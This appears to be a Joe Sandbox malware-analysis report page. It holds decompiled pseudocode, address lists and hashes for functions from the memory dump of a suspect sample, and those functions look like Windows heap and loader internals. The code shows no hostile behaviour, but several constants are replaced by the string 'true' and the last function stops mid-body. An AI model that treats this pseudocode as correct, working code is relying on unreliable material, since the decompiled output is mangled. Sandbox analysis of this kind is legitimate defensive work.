0x32902e49
0x32902e49
0x32902e4d
0x00000000
0x328c4275
0x328c4275
0x328c4289
0x328c428d
0x32902e44
0x00000000
0x328c4293
0x328c429e
0x328c42a5
0x328c42ab
0x328c42ae
0x328c42b2
0x328c42b5
0x328c42bc
0x328c42c0
0x328c42d2
0x328c42d4
0x328c42db
0x328c42df
0x328c42e2
0x328c42e7
0x328c42ea
0x328c42f0
0x328c430b
0x32902e59
0x32902e5d
0x32902e6e
0x32902e73
0x328c4311
0x328c4314
0x328c4322
0x328c4327
0x00000000
0x328c4327
0x328c42f2
0x328c42f2
0x328c42f5
0x328c42f7
0x328c42f7
0x328c42f0
0x328c428d
0x328c426f
0x328c424e
0x328c42ff

Strings

@, xrefs: 328C4220

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c0e3eca1f6f8141910cf5131f1ecfd614971ec24af436a177c75329b0d2be675
Instruction ID: a382e11cc7193a6bca1d2bc72ea4ae8682b5fa3da56b232cf02ba93237c9e749
Opcode Fuzzy Hash: c0e3eca1f6f8141910cf5131f1ecfd614971ec24af436a177c75329b0d2be675
Instruction Fuzzy Hash: DA51AE755017209FD320CF69C841A6BB7F8FF48710F00892EFAA5976A0EBB4E944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 3290C3B0 Relevance: 1.4, Strings: 1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E3290C3B0(char* _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x3298b370 ^ _t82;
				_push("true");
				_pop(_t41);
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E328C4E50("true",  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E3290C574(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						L328D8F40( &_v1152, 0, "true");
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E3290C3B0;
						L328D8F40( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E328E8940( &_v1072, _t75, _t79, _t80, _t81);
						E3291A5E0(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						L328D2C70();
					}
					return E328D4B50(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E3290C7DD(_a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E3290C6F2(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					L328D8F40( &_v96, 0, "true");
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push("true");
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E328D2B00();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E3290C5F5(_a4,  &_v352, _t80);
						}
					}
					E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E328D2A80();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x3290c3c2
0x3290c3c8
0x3290c3ca
0x3290c3cd
0x3290c3d6
0x3290c3d7
0x3290c3ee
0x3290c3ff
0x3290c411
0x3290c415
0x3290c4db
0x3290c4db
0x3290c4dd
0x3290c4e2
0x3290c4e9
0x3290c4f5
0x3290c4fd
0x3290c50d
0x3290c517
0x3290c528
0x3290c536
0x3290c537
0x3290c54c
0x3290c551
0x3290c557
0x3290c559
0x3290c559
0x3290c571
0x3290c571
0x3290c425
0x3290c430
0x3290c434
0x00000000
0x00000000
0x3290c43a
0x3290c447
0x3290c452
0x3290c456
0x3290c458
0x3290c465
0x3290c46a
0x3290c473
0x3290c474
0x3290c479
0x3290c47a
0x3290c482
0x3290c483
0x3290c48e
0x3290c492
0x3290c498
0x3290c49f
0x3290c49f
0x3290c4a6
0x3290c4a8
0x3290c4ab
0x3290c4b2
0x3290c4b2
0x3290c4a6
0x3290c4c7
0x3290c4c7
0x3290c4cc
0x3290c4d2
0x3290c4d9
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 3290C3FF

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 6d57b3c1ce5d19cfe6c3b67bcabb2f1ac90d0dd9ad7cd9faee895d5aca6781ba
Instruction ID: 6a039e29253de8b55ed9de1bb573dcebf1f1136e1650e7cf298634cba4637b15
Opcode Fuzzy Hash: 6d57b3c1ce5d19cfe6c3b67bcabb2f1ac90d0dd9ad7cd9faee895d5aca6781ba
Instruction Fuzzy Hash: D64160F690012CABDB21DB64DC80FDEB77CEB44714F0085E5EA18AB141DB709E898FA4

Uniqueness

Uniqueness Score: -1.00%

Function 32919429 Relevance: 1.4, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E32919429(void* __edx) {
				intOrPtr _v8;
				signed short* _v12;
				void* __ecx;
				void* _t16;
				signed int _t17;
				intOrPtr _t20;
				void** _t21;
				signed int _t22;
				void* _t24;
				void** _t30;
				signed int _t31;
				void* _t35;
				void* _t36;
				intOrPtr _t37;
				void* _t38;
				void* _t39;
				intOrPtr _t42;
				signed int _t45;
				void* _t47;
				void* _t53;
				void* _t54;
				signed short* _t55;
				signed int _t60;
				signed short* _t65;
				void* _t66;
				void* _t67;

				_push(_t39);
				_push(_t39);
				_v8 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t53 = L328A5D90(_t39,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, "true");
				if(_t53 == 0) {
					L21:
					_t16 = 0xc0000017;
				} else {
					_t17 = 9;
					memset(_t53, 0, _t17 << 2);
					_t67 = _t66 + 0xc;
					_t42 =  *0x32861b98; // 0x1a0018
					 *((intOrPtr*)(_t53 + 8)) = _t42;
					_t20 =  *0x32861b9c; // 0x32874444
					 *((intOrPtr*)(_t53 + 0xc)) = _t20;
					_t21 =  *0x32985244; // 0x0
					if( *_t21 != 0x32985240) {
						L20:
						_push(3);
						asm("int 0x29");
						goto L21;
					} else {
						 *_t53 = 0x32985240;
						_t65 = 0x32985000;
						 *(_t53 + 4) = _t21;
						 *_t21 = _t53;
						 *0x32985244 = _t53;
						if( *0x32985000 == 0) {
							L19:
							_t16 = 0;
						} else {
							_push("true");
							_pop(_t54);
							do {
								_t35 = 9;
								while(1) {
									_t22 =  *_t65 & 0x0000ffff;
									_t45 = _t22;
									if(_t22 != _t54 && _t22 != _t35) {
										break;
									}
									_t65 =  &(_t65[1]);
								}
								_t55 = _t65;
								_v12 = _t55;
								if(_t22 == 0) {
									goto L19;
								} else {
									_t60 = 9;
									_push("true");
									_pop(_t36);
									while(_t45 != _t36 && _t45 != _t60) {
										_t65 =  &(_t65[1]);
										_t31 =  *_t65 & 0x0000ffff;
										_t45 = _t31;
										if(_t31 != 0) {
											continue;
										}
										break;
									}
									_t37 = _v8;
									if(_t55 == _t65) {
										goto L19;
									} else {
										 *_t65 = 0;
										_t24 = E328D79A0(_t55, L"verifier.dll");
										_pop(_t47);
										if(_t24 == 0) {
											goto L18;
										} else {
											_t38 = L328A5D90(_t47, _t37, 0, "true");
											if(_t38 == 0) {
												goto L21;
											} else {
												memset(_t38, 0, _t60 << 2);
												_t67 = _t67 + 0xc;
												E328D5050(_t38 + 8, _t38 + 8, _v12);
												_t30 =  *0x32985244; // 0x0
												if( *_t30 != 0x32985240) {
													goto L20;
												} else {
													 *_t38 = 0x32985240;
													 *(_t38 + 4) = _t30;
													 *_t30 = _t38;
													 *0x32985244 = _t38;
													goto L18;
												}
											}
										}
									}
								}
								goto L22;
								L18:
								_t65 =  &(_t65[1]);
								_push("true");
								_pop(_t54);
							} while ( *_t65 != 0);
							goto L19;
						}
					}
				}
				L22:
				return _t16;
			}

0x3291942e
0x3291942f
0x32919442
0x3291944a
0x3291944e
0x3291955d
0x3291955d
0x32919454
0x32919456
0x3291945d
0x3291945d
0x3291945f
0x32919465
0x3291946d
0x32919472
0x32919475
0x3291947c
0x32919558
0x32919558
0x3291955b
0x00000000
0x32919482
0x32919482
0x32919484
0x32919489
0x3291948c
0x32919496
0x3291949c
0x32919554
0x32919554
0x329194a2
0x329194a2
0x329194a4
0x329194a5
0x329194a7
0x329194a8
0x329194a8
0x329194ab
0x329194b0
0x00000000
0x00000000
0x329194b7
0x329194b7
0x329194bc
0x329194be
0x329194c4
0x00000000
0x329194ca
0x329194cc
0x329194cd
0x329194cf
0x329194d0
0x329194da
0x329194dd
0x329194e0
0x329194e5
0x00000000
0x00000000
0x00000000
0x329194e5
0x329194e7
0x329194ec
0x00000000
0x329194ee
0x329194f6
0x329194f9
0x329194ff
0x32919502
0x00000000
0x32919504
0x3291950e
0x32919512
0x00000000
0x32919514
0x3291951d
0x3291951d
0x32919523
0x32919528
0x32919534
0x00000000
0x32919536
0x32919536
0x32919538
0x3291953b
0x3291953d
0x00000000
0x3291953d
0x32919534
0x32919512
0x32919502
0x329194ec
0x00000000
0x32919543
0x32919543
0x32919548
0x3291954a
0x3291954b
0x00000000
0x329194a5
0x3291949c
0x3291947c
0x32919562
0x32919566

Strings

verifier.dll, xrefs: 329194F0

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 9d91c95780e2d1e96c66a742af81352ea3300449033b723d4b01992758b24af8
Instruction ID: f1160e30650300fb15dbadf3c7ac79e4d293dc27ebec37764cd1ff7fe586e15c
Opcode Fuzzy Hash: 9d91c95780e2d1e96c66a742af81352ea3300449033b723d4b01992758b24af8
Instruction Fuzzy Hash: F331F4B97003069FF7148F1E9850B2677EDEB88754F95843AEA0AEF381EA719C818750

Uniqueness

Uniqueness Score: -1.00%

Function 328C7425 Relevance: 1.4, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E328C7425(void* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				signed int _t72;
				void* _t75;
				intOrPtr _t76;
				void* _t77;
				signed int _t79;

				_v12 = _v12 & 0x00000000;
				_t77 = __edx;
				_t75 = __ecx;
				if(__edx == 0 || __ecx == 0) {
					L24:
					return 0xc000000d;
				} else {
					_t62 = _a4;
					if(_t62 == 0) {
						goto L24;
					}
					_v16 =  *_t62;
					_t64 = L328A5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", 0xaa);
					_v20 = _t64;
					if(_t64 == 0) {
						return 0xc0000017;
					}
					_t45 =  *(_t77 + 6) & 0x0000ffff;
					if(( *(_t77 + 6) & 0x0000ffff) <= 0) {
						_v24 = _t64;
						_v28 = 0xaa0000;
						if(L328B4F40( *(_t77 + 4) & 0x0000ffff,  &_v28) != 0) {
							L6:
							_t76 = _a8;
							_t66 = _a12;
							if( *_t62 <= 0 ||  *_t62 > _t66) {
								L8:
								_t72 = _v16;
								_t20 = _t72 + 1; // 0x1
								_t79 = _t20 + ((_v28 & 0x0000ffff) >> 1);
								if(_t76 != 0) {
									if(_t72 >= _t79) {
										goto L9;
									}
									if(_t79 >= _t66) {
										L10:
										if(_t76 != 0) {
											_v12 = 0xc0000023;
										}
										L11:
										 *_t62 = _t79;
										goto L12;
									}
									E328D88C0(_t76 + _t72 * 2, _v24, _v28 & 0x0000ffff);
									 *((short*)(_t76 + _t79 * 2 - 2)) = 0;
									goto L11;
								}
								L9:
								if(_t79 < _t66) {
									goto L11;
								}
								goto L10;
							} else {
								if(L328B2CEB(_v24,  *_t62) != 0) {
									L12:
									E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v20);
									return _v12;
								}
								_t66 = _a12;
								goto L8;
							}
						}
						_v12 = 0xc00000e5;
						goto L12;
					}
					E328D5050( *( *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0xc)) + _t45 * 2),  &_v28,  *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0x10)) +  *( *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0xc)) + _t45 * 2) * 2);
					goto L6;
				}
			}

0x328c742d
0x328c7433
0x328c7436
0x328c743a
0x32904439
0x00000000
0x328c7448
0x328c7448
0x328c744d
0x00000000
0x00000000
0x328c7455
0x328c746e
0x328c7470
0x328c7475
0x00000000
0x32904417
0x328c747b
0x328c7482
0x328c74f6
0x328c74fe
0x328c750c
0x328c74a1
0x328c74a4
0x328c74a7
0x328c74aa
0x328c74b4
0x328c74b4
0x328c74bd
0x328c74c0
0x328c74c4
0x328c7515
0x00000000
0x00000000
0x328c7519
0x328c74ca
0x328c74cc
0x3290442d
0x3290442d
0x328c74d2
0x328c74d2
0x00000000
0x328c74d2
0x328c7527
0x328c7531
0x00000000
0x328c7531
0x328c74c6
0x328c74c8
0x00000000
0x00000000
0x00000000
0x328c7538
0x328c7546
0x328c74d4
0x328c74e3
0x00000000
0x328c74e8
0x328c7548
0x00000000
0x328c7548
0x328c74aa
0x32904421
0x00000000
0x32904421
0x328c749c
0x00000000
0x328c749c

Strings

#, xrefs: 3290442D

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction ID: 68311cf1d876461263b480790bcc9540e00ef8af942e2d12afb54b5d394ae72f
Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction Fuzzy Hash: D741C1B9A00629DFDF14CF88C890BAEFBB8FF40745F40809AE954A7240DB74D941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 328C360F Relevance: 1.4, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E328C360F(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _v60;
				intOrPtr* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				void* _v96;
				intOrPtr* _t41;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t53;
				signed int _t55;
				void* _t58;
				intOrPtr* _t59;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr _t69;
				void* _t72;
				intOrPtr* _t73;
				intOrPtr _t75;
				void* _t76;
				signed int _t80;

				_t69 = __edx;
				_t82 = (_t80 & 0xfffffff8) - 0x5c;
				_v8 =  *0x3298b370 ^ (_t80 & 0xfffffff8) - 0x0000005c;
				_t41 = _a4;
				_v96 = _t41;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				if(_t41 == 0) {
					L23:
					_t75 = 0xc000000d;
					goto L10;
				} else {
					_t75 = 0;
					 *_t41 = 0;
					if(__edx == 0) {
						goto L23;
					} else {
						_t73 = __edx + 4;
						_t59 =  *_t73;
						while(_t59 != _t73) {
							_t68 = _t59 - 8;
							if( *_t68 != 0x74736c46) {
								_v72 = 1;
								_v68 = 1;
								_v88 = 1;
								_push( &_v92);
								_v84 = _t75;
								_v76 = 4;
								_v64 = _t73;
								_v60 = _t68;
								_v92 = 0xc0150015;
								E328E8A60(_t68, _t69);
								_t61 = _t59 - 8;
							}
							if( *(_t61 + 4) == 0x20) {
								L22:
								_t59 =  *_t59;
								_push(1);
								_pop(1);
								continue;
							} else {
								_t53 = _t75;
								_t69 = _t61;
								while(( *(_t69 + 0x20) & 0x00000004) == 0) {
									_t53 = _t53 + 1;
									_t69 = _t69 + 0x30;
									if(_t53 < 0x20) {
										continue;
									} else {
										goto L22;
									}
									goto L24;
								}
								_t55 =  *(_t61 + 4) + 1;
								 *(_t61 + 4) = _t55;
								 *(_t61 + 0x14) =  !_t55;
								_t12 = _t69 + 0x18; // 0x100000016
								_t61 = _t12;
								if(_t61 == 0) {
									goto L22;
								} else {
									L9:
									 *((intOrPtr*)(_t65 + 8)) = 8;
									 *_v96 = _t65;
									L10:
									_pop(_t72);
									_pop(_t76);
									_pop(_t58);
									return E328D4B50(_t75, _t58, _v8 ^ _t82, _t69, _t72, _t76);
								}
							}
							goto L24;
						}
						_t60 = L328A5D90(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t75, 0x618);
						if(_t60 == 0) {
							_t75 = 0xc0000017;
							goto L10;
						} else {
							L18();
							 *((intOrPtr*)(_t60 + 4)) = 1;
							_t65 = _t60 + 0x18;
							 *((intOrPtr*)(_t60 + 0x14)) = 0xfffffffe;
							_t48 = _t60 + 8;
							_t69 =  *_t73;
							if( *((intOrPtr*)(_t69 + 4)) != _t73) {
								_t66 = 3;
								asm("int 0x29");
								 *_t66 = 0x74736c46;
								_push("true");
								 *((intOrPtr*)(_t66 + 0x10)) = 0;
								_t67 = _t66 + 0x1c;
								_pop(_t49);
								do {
									 *((intOrPtr*)(_t67 - 4)) = 0;
									 *_t67 = 0;
									_t67 = _t67 + 0x30;
									 *((intOrPtr*)(_t67 - 0x2c)) = 0xc;
									 *((intOrPtr*)(_t67 - 0x28)) = 0;
									_t49 = _t49 - 1;
								} while (_t49 != 0);
								return _t49;
							} else {
								 *_t48 = _t69;
								 *((intOrPtr*)(_t48 + 4)) = _t73;
								 *((intOrPtr*)(_t69 + 4)) = _t48;
								 *_t73 = _t48;
								goto L9;
							}
						}
					}
				}
				L24:
			}

0x328c360f
0x328c3617
0x328c3621
0x328c3625
0x328c3628
0x328c362b
0x328c362c
0x328c362d
0x328c3630
0x32902969
0x32902969
0x00000000
0x328c3636
0x328c3636
0x328c3638
0x328c363c
0x00000000
0x328c3642
0x328c3642
0x328c3647
0x328c364a
0x328c364e
0x328c3657
0x32902925
0x32902929
0x3290292d
0x32902935
0x32902936
0x3290293a
0x32902942
0x32902946
0x3290294a
0x32902952
0x32902957
0x32902957
0x328c3661
0x3290295f
0x3290295f
0x32902961
0x32902963
0x00000000
0x328c3667
0x328c3667
0x328c3669
0x328c366b
0x328c36ab
0x328c36ac
0x328c36b2
0x00000000
0x328c36b4
0x00000000
0x328c36b4
0x00000000
0x328c36b2
0x328c3674
0x328c3675
0x328c367a
0x328c367d
0x328c367d
0x328c3682
0x00000000
0x328c3688
0x328c3688
0x328c368c
0x328c3693
0x328c3695
0x328c369b
0x328c369c
0x328c369d
0x328c36a8
0x328c36a8
0x328c3682
0x00000000
0x328c3661
0x328c36cd
0x328c36d1
0x328c3701
0x00000000
0x328c36d3
0x328c36d5
0x328c36da
0x328c36e1
0x328c36e4
0x328c36eb
0x328c36ee
0x328c36f3
0x328c370a
0x328c370b
0x328c370f
0x328c3715
0x328c3717
0x328c371a
0x328c371d
0x328c371e
0x328c371e
0x328c3721
0x328c3723
0x328c3726
0x328c372d
0x328c3730
0x328c3730
0x328c3735
0x328c36f5
0x328c36f5
0x328c36f7
0x328c36fa
0x328c36fd
0x00000000
0x328c36fd
0x328c36f3
0x328c36d1
0x328c363c
0x00000000

Strings

Flst, xrefs: 328C3651

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: Flst
API String ID: 0-2374792617
Opcode ID: 6964f0b976c26db08e3f34801b35afc47f23f6c6c6c268b65b8bc5e089612b8b
Instruction ID: e058af26634e228bf9b18c2ed013d541e919f27157f127ad80602061bf60612d
Opcode Fuzzy Hash: 6964f0b976c26db08e3f34801b35afc47f23f6c6c6c268b65b8bc5e089612b8b
Instruction Fuzzy Hash: 4741C7B9A05311DFD308CF18C180A16FBE4EB89718F54856EE469CF382DB71D886CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3290C6F2 Relevance: 1.3, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E3290C6F2(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_push("true");
				_v16 = __edx;
				_pop(_t40);
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E328D2B00();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L328A5D90(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E328D2B00();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t38 = _t47 + 0xc;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x3290c6fd
0x3290c701
0x3290c704
0x3290c707
0x3290c70d
0x3290c70e
0x3290c712
0x3290c717
0x3290c71a
0x3290c71b
0x3290c71c
0x3290c71d
0x3290c71f
0x3290c722
0x3290c729
0x3290c72a
0x3290c72b
0x3290c732
0x3290c736
0x3290c738
0x3290c738
0x3290c743
0x3290c7ac
0x3290c7ae
0x3290c7b0
0x3290c7c0
0x3290c7c2
0x3290c7cf
0x3290c7cf
0x3290c7d5
0x3290c7da
0x3290c7da
0x3290c7b5
0x3290c7ba
0x00000000
0x3290c7ba
0x3290c758
0x3290c75c
0x3290c766
0x3290c767
0x3290c76d
0x3290c76e
0x3290c770
0x3290c771
0x3290c779
0x3290c77d
0x3290c7be
0x00000000
0x3290c7be
0x3290c783
0x3290c78b
0x3290c78b
0x3290c790
0x3290c794
0x00000000
0x3290c796
0x3290c799
0x3290c7a3
0x3290c7a5
0x3290c7a5
0x00000000
0x3290c7a3
0x3290c794
0x3290c75e
0x00000000

Strings

BinaryName, xrefs: 3290C722

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 89cda412d651e061217d222577e161977f3b603912684296539f57b0d8160e90
Instruction ID: 90a5cea9c3fb9e8e6a0cedc36998fbb4d7bbc909b31f7a3bc0a0411098a33d98
Opcode Fuzzy Hash: 89cda412d651e061217d222577e161977f3b603912684296539f57b0d8160e90
Instruction Fuzzy Hash: 9631E97A90061DEFEB15CB58C945EAFB778EF80B24F118569E914A7250DB70EE04CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 328E717A Relevance: .7, Instructions: 705
COMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E328E717A(signed int __ecx, signed int __edx, signed int _a4, signed short _a8, signed short _a12) {
				unsigned int _v5;
				signed int _v6;
				signed int _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed short _v32;
				signed int _v36;
				signed int* _v40;
				signed short _v44;
				signed int _v48;
				signed short _v52;
				signed int _v56;
				char _v60;
				unsigned int _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t250;
				signed short _t252;
				signed short _t253;
				signed short _t254;
				unsigned int _t267;
				signed short _t270;
				signed int _t271;
				signed int* _t274;
				signed int _t276;
				signed int _t281;
				signed char _t282;
				signed short _t283;
				signed short _t289;
				signed char _t290;
				signed int _t295;
				signed short _t298;
				signed short* _t299;
				signed int _t305;
				signed short _t307;
				signed int _t310;
				signed short _t315;
				void* _t318;
				signed int _t322;
				signed short _t323;
				signed short _t328;
				signed char* _t329;
				signed char _t330;
				signed int _t335;
				signed int _t344;
				signed short _t348;
				signed short _t351;
				signed char _t353;
				signed char _t355;
				signed short _t356;
				signed short _t358;
				signed short _t359;
				signed short _t361;
				unsigned int _t362;
				signed int _t363;
				signed int _t370;
				signed int _t372;
				signed short _t373;
				signed short _t374;
				unsigned int _t378;
				void* _t387;
				unsigned int _t392;
				void* _t393;
				signed short _t395;
				signed int _t396;
				signed short _t397;
				signed int* _t406;
				intOrPtr _t409;
				signed short _t425;
				unsigned int _t430;
				intOrPtr* _t431;
				unsigned int _t437;
				void* _t442;
				void* _t443;
				signed short* _t444;
				unsigned int _t445;
				signed short _t449;
				unsigned int _t456;
				void* _t463;
				signed int _t476;
				void* _t478;
				signed char _t480;
				signed short _t481;
				void* _t483;
				signed int _t486;
				signed int _t491;
				signed int* _t492;
				signed short* _t494;
				void* _t497;
				signed short _t498;
				signed short _t499;
				intOrPtr _t504;
				signed int _t509;
				unsigned int _t511;
				signed int _t519;
				signed short _t521;
				signed int _t523;
				signed short _t527;
				signed int _t528;
				signed int _t531;
				signed int _t535;
				signed int _t536;
				signed int _t541;
				signed short _t542;
				signed short* _t545;
				signed char* _t546;
				unsigned int _t547;
				signed short _t550;
				void* _t552;
				signed int _t553;
				signed short _t555;

				_t535 = __ecx;
				_t378 = 0;
				_t249 = __edx;
				_v12 = __ecx;
				_v20 = __edx;
				_t518 = 0;
				if( *((intOrPtr*)(__ecx + 8)) != 0xddeeddee) {
					__eflags =  *(__ecx + 0x44) & 0x01000000;
					if(( *(__ecx + 0x44) & 0x01000000) != 0) {
						L148:
						_t250 = L328A3C60(_t535, _t518, _t249);
						_t519 = _t250 & 0x000000ff;
						__eflags = _t250;
						if(_t250 == 0) {
							goto L7;
						}
						L149:
						_t252 = _a12;
						__eflags = _t252;
						if(_t252 != 0) {
							__eflags = 0;
							 *_t252 = 0;
						}
						_t253 = _a8;
						__eflags = _t253;
						if(_t253 != 0) {
							 *_t253 = _t378;
						}
						_t254 = L328A3C20(_t535);
						__eflags = _t254;
